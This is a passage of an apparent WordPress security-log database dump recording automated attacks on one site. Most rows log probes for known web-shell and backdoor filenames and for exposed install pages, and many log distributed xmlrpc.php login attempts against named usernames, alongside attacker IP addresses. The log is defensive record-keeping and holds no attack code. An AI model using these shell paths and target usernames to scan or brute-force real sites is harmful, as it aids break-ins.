19,0),('103.90.160.176',1733992624,'',0,1680266292.0085,55,'FKcOgTtwuzILqov6Yri9NP1U','','19|0|0|0|cmdev-site1.com/wp-uploads.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266293.3781,55,'CsrkluvZiXjz5cRO31hS0mqf','','19|0|0|0|cmdev-site1.com/sh.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266295.0760,55,'K7SHZ3UMm6YQtzdVxLDEXJA0','','19|0|0|0|cmdev-site1.com/k.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266296.4156,55,'dEzo62iPMSjHDVhIlgK1f4mQ','','19|0|0|0|cmdev-site1.com/wikindex.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266297.4320,55,'KjGHuxkcOPaNifphLF7qBb8C','','19|0|0|0|cmdev-site1.com/y.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266298.6335,55,'IC4eLhGJ3KoxjtsgamiP5fQS','','19|0|0|0|cmdev-site1.com/alf.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266299.6757,55,'jliEmxWCHtDFaUyLKZp9cRqJ','','19|0|0|0|cmdev-site1.com/WSO.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266300.7714,55,'9WreiKGpbFI7Qa8ACHs2OxT3','','19|0|0|0|cmdev-site1.com/10.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266301.7303,55,'NBZoJqiSVjgkT67QYhEtn49D','','19|0|0|0|cmdev-site1.com/2index.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266302.8698,55,'iXLsbtv0HQEmAqCRzdOYgfye','','19|0|0|0|cmdev-site1.com/mari.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266304.0152,55,'QS13kLNApnO5DbZqhRo8fX6G','','19|0|0|0|cmdev-site1.com/1.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266305.0595,55,'aKc01OuWvmhIpETXrtULBDRq','','19|0|0|0|cmdev-site1.com/100.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266306.2650,55,'uazbZyVK1E5pgMwC62SqlQBk','','19|0|0|0|cmdev-site1.com/wp-admin.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266307.3435,55,'9VOLqoND5yCMmeTrlHXpPiYz','','19|0|0|0|cmdev-site1.com/shx.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266309.0501,55,'wMAkO7H0c8f1uatBp4Cbm5yS','','19|0|0|0|cmdev-site1.com/xx.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266310.0767,55,'D9HeL4gbWBmwjzMtnqQFYxA7','','19|0|0|0|cmdev-site1.com/shell.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266311.3427,55,'YRptZWFjzxwbkqmSNOrG2XDd','','19|0|0|0|cmdev-site1.com/wso1.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266312.5049,55,'6UvTYqI0EQGrtaAgDn3RmMjc','','19|0|0|0|cmdev-site1.com/doc.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266313.5017,55,'QOYCHpwFX5ruk4jL6IDRVBnl','','19|0|0|0|cmdev-site1.com/wso2.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266314.8612,55,'gbkAKr8Wdyx2SDZUFBOmRlvG','','19|0|0|0|cmdev-site1.com/wp-content/wp.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266315.8818,55,'jvIGuiZDYAzL4dtxMVhowH7Q','','19|0|0|0|cmdev-site1.com/uploads/up.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266317.0828,55,'3GO5Kx82tiJVH4FMgpzdePQU','','19|0|0|0|cmdev-site1.com/old-index.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266318.2437,55,'wLBHWy8CoA6i3GOr0Rj2nXh7','','19|0|0|0|cmdev-site1.com/9.php',0,19,0),('103.90.160.176',1733992624,'',0,1680266319.4382,55,'iD8nSYspLGyjOZwJHdKUltzC','','19|0|0|0|cmdev-site1.com/date.php',0,19,0),('194.87.151.73',3260520265,'',0,1680303005.1695,10,'h4atspm0gSuqfR3MQ2HUzoD6','','707|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,707,0),('194.87.151.73',3260520265,'',0,1680303011.1421,55,'Hw3UdE81VF6cktxoehBQAaiy','','19|0|0|0|cmdev-site1.com/wp-content/plugins/seoplugins/db.php',0,19,0),('194.87.151.73',3260520265,'',0,1680310609.6980,55,'e3t9IgGxLcwpjKyNJU8suz24','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php',0,19,0),('165.232.164.241',2783487217,'',0,1680317568.2086,55,'fY3a1iOpnMwej9uTRkJdUScF','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('165.232.164.241',2783487217,'',0,1680317569.5292,55,'Vw5Y1xBrN2oA6i0ydE7tRpW9','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('165.232.164.241',2783487217,'',0,1680317569.5317,10,'Vw5Y1xBrN2oA6i0ydE7tRpW9','','707|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,707,0),('165.232.164.241',2783487217,'',0,1680318196.4361,55,'LJ04RdDr1SB2WukYCOgQbh8E','','19|0|0|0|cmdev-site1.com/wp-content/plugins/anttt/simple.php',0,19,0),('165.232.164.241',2783487217,'',0,1680318197.5994,55,'kEqQotAsn6S14d2gIxy5ZLR8','','19|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,19,0),('165.232.164.241',2783487217,'',0,1680318198.5087,55,'9Qtfk3qp8udlsHmxX54EnjUF','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php',0,19,0),('165.232.164.241',2783487217,'',0,1680318200.8240,55,'NCyP0kDIJS4uE5L8ZReXxVfl','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php',0,19,0),('165.232.164.241',2783487217,'',0,1680324983.0236,55,'4ewUpan0tc8x1REGfzMSh2bD','','19|0|0|0|cmdev-site1.com/wp-includes/class-index-wordpress.php',0,19,0),('165.232.164.241',2783487217,'',0,1680324984.2068,55,'FpELmoTCzUfJba2lrIQ9PRtB','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,19,0),('165.232.164.241',2783487217,'',0,1680324984.2090,10,'FpELmoTCzUfJba2lrIQ9PRtB','','707|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,707,0),('165.232.164.241',2783487217,'',0,1680324985.2017,55,'XHOo3UTds7lM4Ipuf5te1c6E','','19|0|0|0|cmdev-site1.com/wp-includes/wp-system-cloud.php',0,19,0),('165.232.164.241',2783487217,'',0,1680324986.2946,55,'pzCcnhrQeDsM02q7YWyVtUBH','','19|0|0|0|cmdev-site1.com/wp-includes/class-wp-page-icon.php',0,19,0),('165.232.164.241',2783487217,'',0,1680324987.3159,55,'sYzXmk3B25wWiO6a4RjoDnM8','','19|0|0|0|cmdev-site1.com/wp-includes/class-wordpress-license.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331712.8395,55,'NC1iaoXBHTdFfWOLr9sUEPQz','','19|0|0|0|cmdev-site1.com/backup/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331714.4864,55,'ihI7FovAETG5SB2rMZWUXpfw','','19|0|0|0|cmdev-site1.com/site/wp-admin/install.php',0,19,0),('194.87.151.73',3260520265,'',0,1680402916.3094,55,'BFOHpg9z0mLWwj4buohJqRAN','','19|0|0|0|cmdev-site1.com/wp-admin/includes/moon.php',0,19,0),('194.87.151.73',3260520265,'',0,1680402920.4907,55,'fqLXCw6Be3NbcQHVMl1JDYdr','','19|0|0|0|cmdev-site1.com/wp-includes/moon.php',0,19,0),('194.87.151.73',3260520265,'',0,1680402920.4932,10,'fqLXCw6Be3NbcQHVMl1JDYdr','','707|0|0|0|cmdev-site1.com/wp-includes/moon.php',0,707,0),('194.87.151.73',3260520265,'',0,1680402931.6956,55,'wz3SfXepRLPnlmUZ7J2utrTq','','19|0|0|0|cmdev-site1.com/css/moon.php',0,19,0),('194.87.151.73',3260520265,'',0,1680402934.6990,55,'U73w5Ym82d1NJarBjXqDk0ez','','19|0|0|0|cmdev-site1.com/images/moon.php',0,19,0),('194.87.151.73',3260520265,'',0,1680402936.1869,55,'MSwn25qGZLe7dzCTKiWR6DaI','','19|0|0|0|cmdev-site1.com/wp-content/languages/plugins/moon.php',0,19,0),('194.87.151.73',3260520265,'',0,1680402940.2540,55,'bs1rOIMZaYNpne3SCDWRlT2x','','19|0|0|0|cmdev-site1.com/wp-includes/images/moon.php',0,19,0),('194.87.151.73',3260520265,'',0,1680402944.8421,55,'wNUk3seKQtI7WnLayMV40f9D','','19|0|0|0|cmdev-site1.com/wp-admin/user/moon.php',0,19,0),('194.87.151.73',3260520265,'',0,1680402946.8200,55,'GWQZDogJpOumS197wElFHVUB','','19|0|0|0|cmdev-site1.com/wp-content/languages/moon.php',0,19,0),('159.223.49.95',2682204511,'',0,1680403047.1250,55,'sZP3NfnRWMqi1GzeckogHOm9','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('159.223.49.95',2682204511,'',0,1680403049.0388,55,'ODSMu82giGHw5BmfNd4l6CXx','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('159.223.49.95',2682204511,'',0,1680403049.0409,10,'ODSMu82giGHw5BmfNd4l6CXx','','707|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,707,0),('159.223.49.95',2682204511,'',0,1680403146.8433,55,'wWx8qN7LsI1V0kjA6MPRDgd2','','19|0|0|0|cmdev-site1.com/wp-content/plugins/anttt/simple.php',0,19,0),('159.223.49.95',2682204511,'',0,1680403147.8984,55,'c3LZ8NdXseECTpwg7xz6auQB','','19|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,19,0),('159.223.49.95',2682204511,'',0,1680403148.8102,55,'JwgyQClTupbxz8VGI0Kn71L4','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php',0,19,0),('159.223.49.95',2682204511,'',0,1680403149.8850,55,'qG5EBcvpf8JQh9LDsSFVy4ig','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php',0,19,0),('165.232.164.241',2783487217,'',0,1680404059.8597,100,'eObT6rfEaydv5QuIlzRY092t','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('165.232.164.241',2783487217,'',0,1680404060.9121,100,'Yg7Qek5CpT1lVdvGZDia4389','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('165.232.164.241',2783487217,'',0,1680404640.2848,55,'lh3NYIFy8nd9kWrZJeTQUgSC','','19|0|0|0|cmdev-site1.com/wp-content/plugins/anttt/simple.php',0,19,0),('165.232.164.241',2783487217,'',0,1680404641.4368,55,'bkCKvh2f8WtaHjAixLQYgd7s','','19|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,19,0),('165.232.164.241',2783487217,'',0,1680404644.6060,55,'faGt32pPcCJuNoRqlwk0QZ98','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php',0,19,0),('165.232.164.241',2783487217,'',0,1680404645.6954,55,'nszFWwjH32D5ZO0igYhMSCR6','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410499.1906,55,'0nx9WSbjJFk2gzVLhuYqwda4','','19|0|0|0|cmdev-site1.com/test/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410500.0365,55,'IQW8B6orYVuhq73Cw4MpnkGT','','19|0|0|0|cmdev-site1.com/blog/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410500.8661,55,'sx0a6durFwgtilApbSCYy8oj','','19|0|0|0|cmdev-site1.com/cms/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410502.3008,55,'WAveRTh7pnac6CXiFwHsIOld','','19|0|0|0|cmdev-site1.com/web/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410503.1243,55,'PqfpewYDkG95a1SvuA8OWQbg','','19|0|0|0|cmdev-site1.com/backup/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410503.9225,55,'r2xvkehaFZus0tGE69K4lNAi','','19|0|0|0|cmdev-site1.com/site/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410504.7989,55,'kpHBN3x9nAzTFbQrqym0U41S','','19|0|0|0|cmdev-site1.com/oldsite/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680411126.9694,55,'2UAcKZ1M9GwgF4LR7etYXrlI','','19|0|0|0|cmdev-site1.com/wp-includes/class-index-wordpress.php',0,19,0),('159.223.49.95',2682204511,'',0,1680411128.1026,50,'sjSQ4hlEBUgmtPOKRZM7q1La','','10|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,10,0),('159.223.49.95',2682204511,'',0,1680411128.1035,55,'sjSQ4hlEBUgmtPOKRZM7q1La','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,19,0),('159.223.49.95',2682204511,'',0,1680411129.1672,55,'tUyad7zSrvkI4cYuQmlpPiT3','','19|0|0|0|cmdev-site1.com/wp-includes/wp-system-cloud.php',0,19,0),('159.223.49.95',2682204511,'',0,1680411130.1892,55,'NzuroVxWncjp394t1akUwg8C','','19|0|0|0|cmdev-site1.com/wp-includes/class-wp-page-icon.php',0,19,0),('159.223.49.95',2682204511,'',0,1680411131.2293,55,'Lp832BG1m7cJsQPxM6Y0fTN5','','19|0|0|0|cmdev-site1.com/wp-includes/class-wordpress-license.php',0,19,0),('165.232.164.241',2783487217,'',0,1680411687.8468,55,'oEQ2lLXCbHshmdMZYB3qeNvW','','19|0|0|0|cmdev-site1.com/wp-includes/class-index-wordpress.php',0,19,0),('165.232.164.241',2783487217,'',0,1680411688.9910,50,'aUTNBVZy8uhz4vC9cinDKwSq','','10|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,10,0),('165.232.164.241',2783487217,'',0,1680411688.9942,55,'aUTNBVZy8uhz4vC9cinDKwSq','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,19,0),('165.232.164.241',2783487217,'',0,1680411689.9900,55,'edoszfDRHFX1UcI45jr97SCu','','19|0|0|0|cmdev-site1.com/wp-includes/wp-system-cloud.php',0,19,0),('165.232.164.241',2783487217,'',0,1680411690.9719,55,'iGnCDqtVlJr12SLx3EgoUAfQ','','19|0|0|0|cmdev-site1.com/wp-includes/class-wp-page-icon.php',0,19,0),('165.232.164.241',2783487217,'',0,1680411692.0267,55,'MNseWTPwGfDSqdnYLJkH8X5t','','19|0|0|0|cmdev-site1.com/wp-includes/class-wordpress-license.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416825.2200,55,'n8wdRFkBx7qtVe0rf9Lz5i2K','','19|0|0|0|cmdev-site1.com/wordpress/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416826.2178,55,'3KMAxNbt8olphPangD4ZymCR','','19|0|0|0|cmdev-site1.com/test/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416828.1283,55,'a8SlDjyNhBbf915YidoIHOr6','','19|0|0|0|cmdev-site1.com/blog/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416829.0417,55,'bdf1ysSRAoc89TFBmatIup3V','','19|0|0|0|cmdev-site1.com/cms/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416829.9233,55,'wzibpjhDlHdOY94sVR7fkZuy','','19|0|0|0|cmdev-site1.com/web/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416830.8532,55,'MGkriexLphgnZWEK1buICdTj','','19|0|0|0|cmdev-site1.com/backup/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416831.7065,55,'HE9za2I7NtWnsbL05XyTRFkA','','19|0|0|0|cmdev-site1.com/site/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416832.5452,55,'jxLR58qKbJG0u2nXBfgcNwa9','','19|0|0|0|cmdev-site1.com/oldsite/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680576880.6611,55,'9KQChqxlS76AidawBVU18cek','','19|0|0|0|cmdev-site1.com/wp-content/plugins/anttt/simple.php',0,19,0),('159.223.49.95',2682204511,'',0,1680576882.0664,55,'gaA7jHYZTq1JVfR8vUtKNzS9','','19|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,19,0),('159.223.49.95',2682204511,'',0,1680576882.0707,10,'gaA7jHYZTq1JVfR8vUtKNzS9','','707|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,707,0),('159.223.49.95',2682204511,'',0,1680576882.9148,55,'3bTcGkl4hdjtFAQUNzYfoauR','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php',0,19,0),('159.223.49.95',2682204511,'',0,1680576884.1155,55,'5KR0cDqI27kPaVwGuNsUxFME','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-upload/ROOBOTS.php',0,19,0),('159.223.49.95',2682204511,'',0,1680578468.4645,100,'nFbDi7812rwOopCVdLezQqx9','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('159.223.49.95',2682204511,'',0,1680578469.5052,100,'eiKglQ2ZXLt1PMJkYsOAynqR','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('159.223.49.95',2682204511,'',0,1680586592.8220,55,'k5qiDWwLdeHznytG37EupTbK','','19|0|0|0|cmdev-site1.com/wp-includes/class-index-wordpress.php',0,19,0),('159.223.49.95',2682204511,'',0,1680586593.8493,55,'lJZ1OseYod4S2g9VKL3wA5iq','','19|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,19,0),('159.223.49.95',2682204511,'',0,1680586593.8519,10,'lJZ1OseYod4S2g9VKL3wA5iq','','707|0|0|0|cmdev-site1.com/wp-admin/js/widgets/wp-login.php',0,707,0),('159.223.49.95',2682204511,'',0,1680586594.9726,55,'FQm5bd74IpsJ8xWyZPTSiv36','','19|0|0|0|cmdev-site1.com/wp-includes/wp-system-cloud.php',0,19,0),('159.223.49.95',2682204511,'',0,1680586596.0115,55,'mQ857XCORDfH3j2LFPiaNn6h','','19|0|0|0|cmdev-site1.com/wp-includes/class-wp-page-icon.php',0,19,0),('159.223.49.95',2682204511,'',0,1680586597.0711,55,'skWQavZLAxlTJ30UfYSyOnI5','','19|0|0|0|cmdev-site1.com/wp-includes/class-wordpress-license.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589058.2076,55,'sW78gOpYfbVxecUk0ZRhlvuP','','19|0|0|0|cmdev-site1.com/wp/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589059.0212,55,'bcOXrT1yhuH3MRJYVoFDl6nd','','19|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589059.8699,55,'FkpGcB1txDJ0HPEA4Qd2Ijnh','','19|0|0|0|cmdev-site1.com/old/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589060.6646,55,'cJIoX9rl20FkHQPVOBCZg8Sw','','19|0|0|0|cmdev-site1.com/wordpress/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589061.4943,55,'Y8PFxQcnCUBlkoE19zAjLg3v','','19|0|0|0|cmdev-site1.com/test/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589062.3501,55,'0M6fgaCNoqBItcHkmjzVEGZ1','','19|0|0|0|cmdev-site1.com/blog/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589063.2013,55,'7uJgTjRXxnp2o6NWG3E9LUHA','','19|0|0|0|cmdev-site1.com/cms/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589064.1261,55,'3VHWRD8nsiKTgMXfu4p61Ncd','','19|0|0|0|cmdev-site1.com/web/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589064.9628,55,'O5lCcExIhW64dv7uwB9yTrHf','','19|0|0|0|cmdev-site1.com/backup/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589065.8168,55,'qs3lDNJ7PwQ6rLoKfYd8GcVE','','19|0|0|0|cmdev-site1.com/site/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680589066.6792,55,'pBcZl2eOM6gsjkPb3Dwt9NJf','','19|0|0|0|cmdev-site1.com/oldsite/wp-admin/install.php',0,19,0),('67.198.116.43',1137079339,'Melissa',3,1680612422.8701,5,'zoSeFGwNlWHfgsLZdikvMOc9','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('67.198.116.43',1137079339,'',0,1680612438.3284,55,'UuhcNKOj4Wwoz9kZL2G1sMA5','','19|0|0|0|cmdev-site1.com/edit.php',0,19,0),('67.198.116.43',1137079339,'',3,1680612505.1340,6,'XuTOjoqWVKR93I45MEDJl8Ak','','530|0|0|0|cmdev-site1.com/the-wild-hunt/',0,530,3),('67.198.116.43',1137079339,'Melissa',3,1680612509.4931,5,'Ym6JTPK8GwbhZuxRDkIfnpcd','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('173.212.218.52',2916407860,'',0,1680616552.3287,55,'YCMkNp79OBA5Ud2IEWsTaDwc','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('173.212.218.52',2916407860,'',0,1680616553.4835,55,'CZBNi3oqMEK0OuFdYhH6wpQt','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('173.212.218.52',2916407860,'',0,1680616553.4861,10,'CZBNi3oqMEK0OuFdYhH6wpQt','','707|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,707,0),('20.244.37.144',351544720,'',0,1680617429.6939,55,'QmRDSGocr6HOLealXEWyMu7T','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('20.244.37.144',351544720,'',0,1680617429.6945,55,'JMcAK9Tr5pLjbm3vFlhXSdok','','19|0|0|0|cmdev-site1.com/wp-plain.php',0,19,0),('20.244.37.144',351544720,'',0,1680617429.6986,10,'QmRDSGocr6HOLealXEWyMu7T','','707|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,707,0),('20.244.37.144',351544720,'',0,1680617433.4395,100,'QlK9S5boxkUR3Fy6mzXLpNv2','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('20.244.37.144',351544720,'',0,1680617433.7436,18,'fq7PRtpZmxb4UcDogvO36wG2','','13|0|0|0|cmdev-site1.com/wp-plain.php',0,13,0),('20.244.37.144',351544720,'',0,1680617436.5631,18,'K2uohsEfr3QLbmCjYOBVHMIx','','13|0|0|0|cmdev-site1.com/alfacgiapi/perl.alfa',0,13,0),('20.244.37.144',351544720,'',0,1680617443.6019,100,'Yy4CJaG0uUP23rg9hXEQB7AZ','','13|0|0|0|cmdev-site1.com/wp-content/plugins/apikey/apikey.php',0,13,0),('20.244.37.144',351544720,'',0,1680617444.3458,100,'PDqAZ9yxSdnvmMV65l7hcwg2','','13|0|0|0|cmdev-site1.com/plugins/content/apismtp/apismtp.php',0,13,0),('20.244.37.144',351544720,'',0,1680617445.0748,100,'jamTiDJOdyBY5EKAWStwFCxG','','13|0|0|0|cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected',0,13,0),('20.244.37.144',351544720,'',0,1680617445.7432,100,'nAo3Xj0f2arLk74Izl9huKEY','','13|0|0|0|cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected',0,13,0),('67.198.116.43',1137079339,'',3,1680627822.4084,6,'5yUPohFEwuXB8zNVRTevd9sK','','530|0|0|0|cmdev-site1.com/the-wild-hunt/',0,530,3),('213.152.161.165',3583549861,'techspt',0,1680680772.3976,152,'ZHjncubD6zXMFvKB12wTQE5x','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.187.251.115',3267099507,'techspt',0,1680681174.6541,152,'LBMmE5CS2XcxZOQVNRPTtDlA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('84.39.117.57',1411872057,'techspt',0,1680683144.9829,152,'OG5Ie03EDQlw6xZXnq7TCkpB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.163',2249438115,'techspt',0,1680683867.3636,152,'ud2HS6l0FTc58BekiQCxbMsL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.38.23.179',3257276339,'',0,1680684086.9074,55,'ZMXRTJEOVklY9mfjcahsSN1p','','19|0|0|0|cmdev-site1.com/assets/plugins/plupload/examples/upload.php',0,19,0),('178.162.204.214',2997013718,'techspt',0,1680684325.6238,152,'UFdSleRmMwKusoEJa6Qr2WHt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.162.204.214',2997013718,'techspt',0,1680684530.2205,152,'rWapOYxvduPZkEl9e4oTyFSh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('178.162.204.214',2997013718,'',0,1680684530.2234,10,'rWapOYxvduPZkEl9e4oTyFSh','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('79.142.76.244',1334725876,'techspt',0,1680688059.1758,152,'tD1WIkZRBGjvahCVK45EwopN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('134.19.179.235',2249438187,'techspt',0,1680691130.0089,152,'eHVNBAwYvr4pW167I9sk2tdf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.98.102.243',2372036339,'techspt',0,1680693328.0615,152,'DpgJfQAB8sZKbMuOHm7woiSq','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.198.116.43',1137079339,'Melissa',3,1680693890.1862,5,'PSupvi06bJQaHFkTf9dKY3Zn','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('64.42.179.35',1076540195,'techspt',0,1680694383.0940,152,'XVxCQcNGdwovP3e7mhytDUp5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.15',3583549711,'techspt',0,1680697874.3483,152,'UAzLK7oFuSQcNsPGWOHq3Btb','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.40',3583549736,'techspt',0,1680701053.2058,152,'6ORyBU0GgDv8iMorhspnjfE4','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.205.178.151',1137554071,'melissa',0,1680714535.9071,152,'yLC4Ef8ZQTsDJOcRiHkbY9uG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.9.227.178',1728701362,'melissa',0,1680714536.4721,152,'ZzsYxRoOn745L13fMBhJqSdv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('156.38.151.68',2619774788,'melissa',0,1680714540.6397,152,'QrcyjFx0ZOWlhJ91uMtsULD8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.94.107.15',1113484047,'melissa',0,1680714542.0900,152,'RFzCIQld1YgjeLBANnXUyO60','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.140.29.143',143400335,'melissa',0,1680714550.1392,152,'ns6T1ZS0xDFgoqLzm2dBQiuX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.69.17',1218921745,'melissa',0,1680714550.5513,152,'XeNg3wkW9YcCDtz61IMyOj5h','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.140.29.143',143400335,'melissa',0,1680714555.3173,152,'IwQD35Rmb1kHyrjecJfEWszB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('8.140.29.143',143400335,'',0,1680714555.3195,10,'IwQD35Rmb1kHyrjecJfEWszB','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('43.204.144.128',734826624,'melissa',0,1680714562.0509,152,'n0RiklDz8QKJwhWeu9FfGLsc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('64.227.108.223',1088646367,'melissa',0,1680714574.1585,152,'K82T7F9s0SnQ3XzNgkVqBGlU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1680714574.6050,152,'W2vu7Ds6fw5HrUGSBY9Qyg3t','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('172.105.163.59',2892604219,'melissa',0,1680714578.3153,152,'HXuITzh8Qc0kEJOiSaYemqro','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('121.196.63.97',2042904417,'melissa',0,1680714585.9283,152,'Jqn80DXaYuWeAFoPiIE3zrNd','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('182.50.151.63',3056768831,'melissa',0,1680717231.5442,152,'LsHSGKwJevhbABioZ2R1NIa9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('16.162.192.90',279101530,'melissa',0,1680717232.2342,152,'my4HbOXtwaTp0ik9JU8ljM3s','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('129.226.138.214',2179107542,'melissa',0,1680717233.3